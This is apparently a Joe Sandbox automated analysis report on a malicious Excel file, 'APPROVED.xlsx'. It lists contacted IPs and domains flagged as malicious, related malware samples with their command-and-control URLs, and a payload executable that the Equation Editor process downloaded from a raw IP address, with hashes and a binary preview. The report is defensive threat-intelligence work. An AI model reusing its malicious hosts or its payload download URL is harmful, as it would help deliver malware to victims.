http://www.priceminister.com/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000009.00000000.2170312578.000000000861C000.00000004.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO	explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js	explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	false		high
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.casar.com/assunto/organizacao/	explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.google.si/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.casar.com	explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
3.36.53.50	unknown	United States	8987	AMAZONEXPANSIONGB	true
104.21.65.7	www.cyrilgraze.com	United States	13335	CLOUDFLARENETUS	true
75.2.66.247	ytptranspx.xshoppy.shop	United States	16509	AMAZON-02US	true
54.85.86.211	www.brunoecatarina.com	United States	14618	AMAZON-AESUS	true
156.241.53.161	www.hfjxhs.com	Seychelles	136800	XIAOZHIYUN1-AS-APICIDCNETWORKUS	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.255

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	413096
Start date:	13.05.2021
Start time:	08:28:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	APPROVED.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@17/7@7/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 25.6% (good quality ratio 24.2%) Quality average: 72.6% Quality standard deviation: 28.4%
HCA Information:	Successful, ratio: 98% Number of executed functions: 109 Number of non-executed functions: 57
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/413096/sample/APPROVED.xlsx

Simulations

Behavior and APIs

Time	Type	Description
08:28:59	API Interceptor	137x Sleep call for process: EQNEDT32.EXE modified
08:29:05	API Interceptor	168x Sleep call for process: vbc.exe modified
08:29:37	API Interceptor	512x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.21.65.7	lFfDzzZYTl.exe	Get hash	malicious	Browse	www.cyrilgraze.com/p2io/?iBIXf4M=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VXv2W5rEqXTgoC5w==&_RAd4V=YL0THJvhl8d
	dw0Iro1gcR.exe	Get hash	malicious	Browse	www.cyrilgraze.com/p2io/?0pk=FtxhArA&FjUHSn=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1ZX8ma6yUqB
	lfBVtTwPNQ.exe	Get hash	malicious	Browse	www.cyrilgraze.com/p2io/?E48=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VuwH26lS2QTgoFqA==&oPqLWb=dVeDBDrHInjx
	gqnTRCdv5u.exe	Get hash	malicious	Browse	www.cyrilgraze.com/p2io/?K81d7=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&uTrL=Apdlbf
	g0g865fQ2S.exe	Get hash	malicious	Browse	www.cyrilgraze.com/p2io/?4h3=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25HzHKCsxDG&vTapK=LJBpc8p
	loMStbzHSP.exe	Get hash	malicious	Browse	www.cyrilgraze.com/p2io/?7nEpiRy=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VXv2W5rEqXTgoC5w==&sZvD8l=Spap-DKpf
75.2.66.247	Invoice.xlsx	Get hash	malicious	Browse	www.insershop.com/iu4d/?L2JH=bFjm+7dIUkDoytiq4+cmnuPDP86R5rhIsCCYhRI/G0MMS6HA97F4PgWpOqqF2KUNtHj/hw==&0n=fxlp
	0iEsxw3D7A.exe	Get hash	malicious	Browse	www.qscrit.com/8rg4/?6l=VsHc7njAYTBvoczWHdQttC0IXDsqEoT2aspGnMNUW1tx9TWSknVAapEIqjACukXLl20z&_FN4EJ=3fnDH
	iPv5du05Bu.exe	Get hash	malicious	Browse	www.qscrit.com/8rg4/?ExoHs=VsHc7njAYTBvoczWHdQttC0IXDsqEoT2aspGnMNUW1tx9TWSknVAapEIqjACukXLl20z&alX=TXFDhzv0K60l
	googlechrome_3843.exe	Get hash	malicious	Browse	www.colliapse.com/csv8/?jL30v=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&JB4DYN=9rhd62lx1hk
54.85.86.211	REVISED ORDER.exe	Get hash	malicious	Browse	www.raphaelyejesiel.com/owws/?0pn=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&uDKhk=JfrPs86HdHGxMH
	o52k2obPCG.exe	Get hash	malicious	Browse	www.brunoecatarina.com/p2io/?UlSp=GTgP1nZH9J34Epg&tZU4=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5gmXBr8fNrAN1suaqA==
	q3uHPdoxWP.exe	Get hash	malicious	Browse	www.brunoecatarina.com/p2io/?N4=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&2d=Yn8xRlsx
	uNttFPI36y.exe	Get hash	malicious	Browse	www.brunoecatarina.com/p2io/?CR=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5gmXBr8fNrAN1suaqA==&QL0=ehux_83x40_XBX2
	Introduction APRIL 15 2020.xlsx	Get hash	malicious	Browse	www.brunoecatarina.com/p2io/?QJ=h484VFbPZ8O&Ztxhw=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==
	pumYguna1i.exe	Get hash	malicious	Browse	www.brunoecatarina.com/p2io/?uFNl=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&-ZSXw=ctxh_fYh
	Q1VDYnqeBX.exe	Get hash	malicious	Browse	www.brunoecatarina.com/p2io/?i4=7neTsXcxP&mdslChH=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jKUdbwnAK9b
	KL9fcbfrMB.exe	Get hash	malicious	Browse	www.brunoecatarina.com/p2io/?TT=FjUh3Tu&idCtDnlP=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b
	27hKPHrVa3.exe	Get hash	malicious	Browse	www.brunoecatarina.com/p2io/?RR=YrKhZvg&rp=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jKUdbwnAK9b
	RFQ MEDICAL EQUIPMENT_PDF.exe	Get hash	malicious	Browse	www.marianaesilvio.com/i9p8/?BZ=/ObYwKDkQ2IwhvSmnWHDiNFOgR3i1I/dScSLJZ0AsNZcru1aWxc+dYbzc/ypuU5uo2MC&rvRxXN=hBj0Uri0f8R
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	www.raphaelyejesiel.com/owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src
	JwekqCZAwt.exe	Get hash	malicious	Browse	www.anaejoao2021.com/d8h/?YvFH=wR-xA2rHgBVhIve&KXRxqv=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+ne7AOeWmMaD
	request.exe	Get hash	malicious	Browse	www.anaejoao2021.com/d8h/?1bS=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+neRf+uWiOSD&DXaDp=fRmTtjUX8ZQHeF6
	PO#646756575646.exe	Get hash	malicious	Browse	www.anaejoao2021.com/d8h/?EhLT5l=9rhdJxHx-Bl&YL0=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+k+rPvOu4pzE
	PO8479349743085.exe	Get hash	malicious	Browse	www.anaejoao2021.com/d8h/?-Z1hir=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+kySDOiuvvvVPuj7Qw==&2dz=onrhc

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.cyrilgraze.com	lFfDzzZYTl.exe	Get hash	malicious	Browse	104.21.65.7
	qmhFLhRoEc.exe	Get hash	malicious	Browse	172.67.138.177
	uNttFPI36y.exe	Get hash	malicious	Browse	104.21.65.7
	dw0Iro1gcR.exe	Get hash	malicious	Browse	104.21.65.7
	lfBVtTwPNQ.exe	Get hash	malicious	Browse	104.21.65.7
	g2qwgG2xbe.exe	Get hash	malicious	Browse	104.21.65.7
	gqnTRCdv5u.exe	Get hash	malicious	Browse	104.21.65.7
	g0g865fQ2S.exe	Get hash	malicious	Browse	104.21.65.7
	Q1VDYnqeBX.exe	Get hash	malicious	Browse	172.67.138.177
	KL9fcbfrMB.exe	Get hash	malicious	Browse	172.67.138.177
	loMStbzHSP.exe	Get hash	malicious	Browse	104.21.65.7
www.hfjxhs.com	RDAx9iDSEL.exe	Get hash	malicious	Browse	156.241.53.161
	q3uHPdoxWP.exe	Get hash	malicious	Browse	156.241.53.161
	pumYguna1i.exe	Get hash	malicious	Browse	156.241.53.161
	Q1VDYnqeBX.exe	Get hash	malicious	Browse	156.241.53.161
	Gt8AN6GiOD.exe	Get hash	malicious	Browse	156.241.53.161
	R22032021-PROCESSED.xlsx	Get hash	malicious	Browse	156.241.53.161
www.brunoecatarina.com	o52k2obPCG.exe	Get hash	malicious	Browse	54.85.86.211
	q3uHPdoxWP.exe	Get hash	malicious	Browse	54.85.86.211
	uNttFPI36y.exe	Get hash	malicious	Browse	54.85.86.211
	Introduction APRIL 15 2020.xlsx	Get hash	malicious	Browse	54.85.86.211
	pumYguna1i.exe	Get hash	malicious	Browse	54.85.86.211
	Q1VDYnqeBX.exe	Get hash	malicious	Browse	54.85.86.211
	KL9fcbfrMB.exe	Get hash	malicious	Browse	54.85.86.211
	1LHKlbcoW3.exe	Get hash	malicious	Browse	54.85.86.211
	27hKPHrVa3.exe	Get hash	malicious	Browse	54.85.86.211
www.myfavbutik.com	5PthEm83NG.exe	Get hash	malicious	Browse	172.67.161.4
	qmhFLhRoEc.exe	Get hash	malicious	Browse	104.21.15.16
	dw0Iro1gcR.exe	Get hash	malicious	Browse	172.67.161.4
	Request For Courtesy Call.xlsx	Get hash	malicious	Browse	104.21.15.16
	g2qwgG2xbe.exe	Get hash	malicious	Browse	172.67.161.4
	g0g865fQ2S.exe	Get hash	malicious	Browse	104.21.15.16
shops.myshopify.com	1cec9342_by_Libranalysis.exe	Get hash	malicious	Browse	23.227.38.74
	350969bc_by_Libranalysis.exe	Get hash	malicious	Browse	23.227.38.74
	New_Order.exe	Get hash	malicious	Browse	23.227.38.74
	correct invoice.exe	Get hash	malicious	Browse	23.227.38.74
	PP,Sporda.exe	Get hash	malicious	Browse	23.227.38.74
	Purchase Order.exe	Get hash	malicious	Browse	23.227.38.74
	PAYMENT INSTRUCTIONS COPY.exe	Get hash	malicious	Browse	23.227.38.74
	New Order.exe	Get hash	malicious	Browse	23.227.38.74
	slot Charges.exe	Get hash	malicious	Browse	23.227.38.74
	WAkePI6vWufG5Bb.exe	Get hash	malicious	Browse	23.227.38.74
	PO09641.exe	Get hash	malicious	Browse	23.227.38.74
	PO#6275473, Shipping.exe	Get hash	malicious	Browse	23.227.38.74
	4LkSpeVqKR.exe	Get hash	malicious	Browse	23.227.38.74
	PO889876.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	Il nuovo ordine e nell'elenco allegato.exe	Get hash	malicious	Browse	23.227.38.74
	Order Euro 890,000.exe	Get hash	malicious	Browse	23.227.38.74
	winlog.exe	Get hash	malicious	Browse	23.227.38.74
	products order pdf .exe	Get hash	malicious	Browse	23.227.38.74
	REVISED ORDER.exe	Get hash	malicious	Browse	23.227.38.74
	e9777bb4_by_Libranalysis.exe	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZONEXPANSIONGB	REQUEST FOR COURTESY CALL 2.xlsx	Get hash	malicious	Browse	3.36.109.92
	FORM ZIM911C.xlsx	Get hash	malicious	Browse	3.36.109.92
	Commercial and Technical Proposal for%0D%0A Supply.xlsx	Get hash	malicious	Browse	3.36.91.55
	Request For Courtesy Call.xlsx	Get hash	malicious	Browse	3.36.91.55
	MkisahOBqH.dll	Get hash	malicious	Browse	3.52.190.137
CLOUDFLARENETUS	4c045e17_by_Libranalysis.exe	Get hash	malicious	Browse	104.22.18.188
	ACH WIRE PAYMENT ADVICE.xlsx	Get hash	malicious	Browse	104.18.27.190
	Stolen Images Evidence.js	Get hash	malicious	Browse	172.67.157.17
	17D54F646D676B09788537F84FC3BFC8699D78A6B11B9.exe	Get hash	malicious	Browse	104.26.14.145
	e.exe	Get hash	malicious	Browse	172.67.188.154
	Purchase Order_12052021.exe	Get hash	malicious	Browse	104.21.19.200
	5781525.html	Get hash	malicious	Browse	172.67.150.89
	50eba5e3_by_Libranalysis.dll	Get hash	malicious	Browse	104.20.184.68
	6f61bc36_by_Libranalysis.dll	Get hash	malicious	Browse	104.20.185.68
	50eba5e3_by_Libranalysis.dll	Get hash	malicious	Browse	104.20.184.68
	5781525.html	Get hash	malicious	Browse	172.67.150.89
	6f61bc36_by_Libranalysis.dll	Get hash	malicious	Browse	104.20.184.68
	7e718f4b_by_Libranalysis.exe	Get hash	malicious	Browse	172.67.145.48
	1ChCpaSGY7.dll	Get hash	malicious	Browse	104.20.184.68
	1cec9342_by_Libranalysis.exe	Get hash	malicious	Browse	23.227.38.74
	M7LEWK86J8.exe	Get hash	malicious	Browse	104.21.13.168
	Product specification.xlsx	Get hash	malicious	Browse	172.67.171.184
	595e3339_by_Libranalysis.dll	Get hash	malicious	Browse	172.67.156.7
	7+ Taskbar Tweaker.exe	Get hash	malicious	Browse	172.67.151.27
	7+ Taskbar Tweaker.exe	Get hash	malicious	Browse	104.21.0.149
AMAZON-AESUS	34d0a579_by_Libranalysis.dll	Get hash	malicious	Browse	100.26.111.6
	7bYDInO.rtf	Get hash	malicious	Browse	52.45.173.110
	presupuesto.xlsx	Get hash	malicious	Browse	54.83.52.76
	title deed.docx	Get hash	malicious	Browse	54.83.52.76
	title deed.docx	Get hash	malicious	Browse	54.83.52.76
	executable.2772.exe	Get hash	malicious	Browse	3.223.115.185
	af04e6c8_by_Libranalysis.docx	Get hash	malicious	Browse	54.83.52.76
	0000003602.pdf.exe	Get hash	malicious	Browse	52.6.206.192
	INV-Receipt.html	Get hash	malicious	Browse	54.225.169.203
	gCcAUOanux.exe	Get hash	malicious	Browse	3.223.115.185
	RFQ-2176 NEW PROJECT QUOTATION MAY.exe	Get hash	malicious	Browse	3.93.205.129
	title deed.docx	Get hash	malicious	Browse	54.83.52.76
	title deed.docx	Get hash	malicious	Browse	54.83.52.76
	svch.exe	Get hash	malicious	Browse	54.225.144.221
	e0896563_by_Libranalysis.xlsx	Get hash	malicious	Browse	3.223.115.185
	Purchase Order.exe	Get hash	malicious	Browse	3.223.115.185
	presupuesto.xlsx	Get hash	malicious	Browse	54.83.52.76
	installer_win.exe	Get hash	malicious	Browse	52.72.172.158
	FY9Z5TR6rr.exe	Get hash	malicious	Browse	3.223.115.185
	WAkePI6vWufG5Bb.exe	Get hash	malicious	Browse	52.0.7.30
AMAZON-02US	XPChvE6GQd	Get hash	malicious	Browse	18.133.194.34
	ACH WIRE PAYMENT ADVICE.xlsx	Get hash	malicious	Browse	13.224.193.116
	ACH WIRE PAYMENT ADVICE.xlsx	Get hash	malicious	Browse	3.130.4.114
	#Ud83d#Udce0Lori's Fax VM-002.html	Get hash	malicious	Browse	13.224.193.12
	1cec9342_by_Libranalysis.exe	Get hash	malicious	Browse	44.227.76.166
	595e3339_by_Libranalysis.dll	Get hash	malicious	Browse	13.225.75.73
	GmCEpa2M7R.dll	Get hash	malicious	Browse	13.225.75.73
	New-Order 04758485.exe	Get hash	malicious	Browse	3.16.197.4
	350969bc_by_Libranalysis.exe	Get hash	malicious	Browse	52.58.78.16
	7bYDInO.rtf	Get hash	malicious	Browse	52.210.171.182
	nT5pUwoJSS.dll	Get hash	malicious	Browse	54.247.61.18
	1c60a1e9_by_Libranalysis.rtf	Get hash	malicious	Browse	44.230.85.241
	Order 122001-220 guanzo.exe	Get hash	malicious	Browse	18.219.49.238
	main_setup_x86x64.exe	Get hash	malicious	Browse	104.192.141.1
	A6FAm1ae1j.exe	Get hash	malicious	Browse	3.138.180.119
	New_Order.exe	Get hash	malicious	Browse	75.2.115.196
	NAVTECO_R1_10_05_2021,pdf.exe	Get hash	malicious	Browse	13.58.50.133
	YDHhjjAEFbel88t.exe	Get hash	malicious	Browse	99.83.175.80
	yU7RItYEQ9kCkZE.exe	Get hash	malicious	Browse	99.83.175.80
	Shipment Document BL,INV and packing List.exe	Get hash	malicious	Browse	52.58.78.16

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xele[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1832960
Entropy (8bit):	7.369530849111079
Encrypted:	false
SSDEEP:	24576:Sv0H4JghFaUabDkakP0/ZeGPDWOlxm0Zx:Y4o/b5f/hR3m0
MD5:	92BD99870C4E2829F3E6D1B3B512067D
SHA1:	2DB671375AE170FF9B3E733FED98C2C7E7EF355A
SHA-256:	D69E95A9CA264C1547CDB2475244A145E79A321A58D35C2B2DD6183A032AAF16
SHA-512:	3A2FD22C948DD0A26B8971C9A907E6FC29AE1F5F32B1B6B23836D29C13E172D6D8C404F3BDFF976F8A20E28968D48A316E1437EB6EFC99FD03C581B44B08A984
Malicious:	true
Reputation:	low
IE Cache URL:	http://3.36.53.50/dose/xele.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.`..............P.................. ... ....@.. .......................`............@.................................@...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................t.......H.......Tm..4............................................................0............(,...(-.........(.....o..........................(/......(0......(1......(2......(3....N..(....o!...(4....N..(....o....(5....&..(6.....s7........s8........s9........s:........s;............0...........~....o<....+...0...........~....o=....+...0...........~....o>....+...0...........~....o?....+...0...........~....o@....+..*.0..<........~.....(A.....,!r...p.....(B...oC...sD..........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32EBDEF2.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7592
Entropy (8bit):	5.465200468507679
Encrypted:	false
SSDEEP:	96:znf0EUcqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwi:bMKSTxK/LA/FVoL3QtKhn+e3+wi
MD5:	08D7A2D1135E3AE03182C9C215EB5855
SHA1:	CD4D3C60B1F98608CE83DD5AF888042CE8A24C25
SHA-256:	47C18D083371F44EBBBCC16EF469F919990B78A3376672454E0BF10B56D0A1CC
SHA-512:	ADB4C156197F14BA2A22A778271605B57C19F7244C5F135011728F3454BB349F65FBF7A4E4D051E9765B64A0F2089CCE9336BDAC113A36D8E7B51CC5D53CDE31
Malicious:	false
Reputation:	low
Preview:	....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................kv..(..............%.q................D.3...3.'..r....\...D.3.....D.3...3.W..r....D.3..6kv_..r.......r..(.4..qP.3....q0..q.......q...q........4..q..3....q.......q...........q..3........q4t.q...q............<.!v.Z.u......(.......(........................udv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5670BE4B.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	high, very likely benign file
